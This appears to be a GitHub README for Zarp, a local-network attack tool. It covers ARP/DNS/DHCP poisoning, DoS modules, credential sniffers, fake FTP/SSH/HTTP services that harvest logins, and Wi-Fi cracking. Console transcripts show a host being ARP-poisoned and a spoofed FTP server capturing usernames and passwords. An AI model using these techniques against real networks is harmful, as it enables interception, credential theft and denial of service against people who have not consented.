-
Notifications
You must be signed in to change notification settings - Fork 322
Home
NOTE: This is still very much a work in progress, and not all functionality is yet implemented. I will update this readme with a link to the blogpost regarding this.
#ZARP
Version 0.03A
Network Attack Tool
@ballastsec, @dronesec
#INTRODUCTION Zarp is a network attack tool centered around exploitation of local networks. This does not include system exploitation, but rather abusing networking protocols and stacks to take over, infiltrate, and knock out. Sessions can be managed to quickly poison and sniff multiple systems at once, dumping sensitive information automatically or to the attacker directly. Various sniffers are included to automatically parse usernames and passwords from various protocols, as well as view HTTP traffic and more. DoS attacks are included to knock out various systems and applications. These tools open up the possibility for very complex attack scenarios on live networks quickly, cleanly, and quietly.
#TOOL OVERVIEW
POISONERS
These tools work as expected; poisoning hosts for performing MitM, session hijacking, etc.
ARP, DNS, DHCP, NBNS
DOS
Modules used for denial of servicing hosts.
Teardrop, IPv6 NDP RA, Nestea, LAND, TCP SYN, SMB2
SNIFFERS
These post-poisoning modules are useful for intercepting interesting traffic.
HTTP, Password and Username
SCANNERS
Scan networks for victims.
Network Scanner, Service Scanner, Access Point Scanner
EMULATE SERVICES
Pretend you're useful; harvest credentials from automatic login tools or unaware users. Spoofed services
have been custom written to act as honeypots; none of these services can actually be used to do useful things as intended.
HTTP, SSH, FTP
PARAMETER
Perform parameter cracking to gain access to a network. AP cracking is harnessed by Wifite.
WEP Crack, WPA2 Crack, WPS Crack, Router pwn
CLI USAGE AND SHORTCUTS
If you want to clear the screen, typing gibberish ('asdf') will wipe the screen and
reprint the current menu.
Typing 'quit' will close out of the application, no matter where you are. Note that this is a 'hard quit', so any running sessions may not be closed gracefully.
Typing 'info [module]' will dump information and usage about the specified module.
'opts' will list session-wide options available for use. As of now only the interface exists, but as time and module development goes on, more will be added. You can set options by typing 'set [key] [value]'.
#USE EXAMPLES
bryan@devbox:~/zarp$ sudo ./zarp.py --help
Usage: zarp.py [options]
Options:
-h, --help show this help message and exit
-q FILTER Quick network sniff with filter
--debug Launch Zarp with error logging
Scanners:
-s SCAN Quick network map
--finger Fingerprint scan packets
-a Service scan
-w Wireless AP scan
--channel=CHANNEL Set channel to scan on
Spoofers:
--ssh SSH server
--ftp FTP server
--http HTTP server
bryan@devbox:~/zarp$
bryan@devbox:~/zarp$ sudo ./zarp.py
[ZARP]
[Version 0.03A]
[1] Poisoners [2] DoS Attacks
[3] Sniffers [4] Scanners
[5] Parameter [6] Spoofer
[7] Sessions
0) Back
>
[1] ARP Poison
[2] DNS Poison
[3] DHCP Poison
0) Back
> 1
[!] Using interface [eth2:08:00:27:2d:7a:6d]
[!] Enter host to poison: 192.168.1.88
[!] Enter address to spoof: 192.168.1.1
[!] Spoof IP 192.168.1.88 from victim 192.168.1.1. Is this correct? y
[!] Initializing ARP poison..
[1] ARP Poison
[2] DNS Poison
[3] DHCP Poison
0) Back
> 0
[ZARP]
[Version 0.02]
[1] Poisoners [2] DoS Attacks
[3] Sniffers [4] Scanners
[5] Parameter [6] Sessions
0) Back
> 6
[Running sessions]
[!] ARP POISONS [arp]:
[0] 192.168.1.88
[1] Stop session
[2] View session
[3] Start session logger
[4] Stop session logger
0) Back
>
bryan@devbox:~/zarp$ sudo ./zarp.py --ftp
[!] Starting FTP server...
[!] Connection from ('192.168.1.118', 54985)
[!] Received 'anonymous:[email protected]' from connection.
[!] Connection from ('192.168.1.118', 54986)
[!] Received 'username:password' from connection.
[!] Connection from ('192.168.1.118', 54987)
[!] Received 'bob:th3bu1ld3r' from connection.
^Cbryan@devbox:~/zarp$
[ZARP] [Version 0.03A] [1] Poisoners [2] DoS Attacks [3] Sniffers [4] Scanners [5] Parameter [6] Spoofer [7] Sessions 0) Back > 7 [Running sessions] [!] ARP POISONS [arp]: [0] 192.168.1.218 |-> [!] DNS POISONS [dns]: |--> [0] .* -> 192.168.1.1 |--> [1] boogers.* -> 192.168.1.1 [!] HTTP SNIFFERS [http]: [0] 192.168.1.218 |--> Logging to /tmp/httplogger.log [1] Stop session [2] View session [3] Start session logger [4] Stop session logger 0) Back >
Performance of the above:
$ ps aux | grep z[ar]p root 15117 0.4 1.7 106368 17800 pts/0 Sl+ 18:00 0:00 /usr/local/bin/python ./zarp.py $ cat /proc/15117/status Name: zarp.py State: S (sleeping) Tgid: 15117 Pid: 15117 PPid: 15115 TracerPid: 0 Uid: 0 0 0 0 Gid: 0 0 0 0 FDSize: 64 Groups: 0 VmPeak: 106368 kB VmSize: 106368 kB VmLck: 0 kB VmHWM: 17800 kB VmRSS: 17800 kB VmData: 30268 kB VmStk: 168 kB VmExe: 1468 kB VmLib: 4744 kB VmPTE: 196 kB Threads: 3 [snip]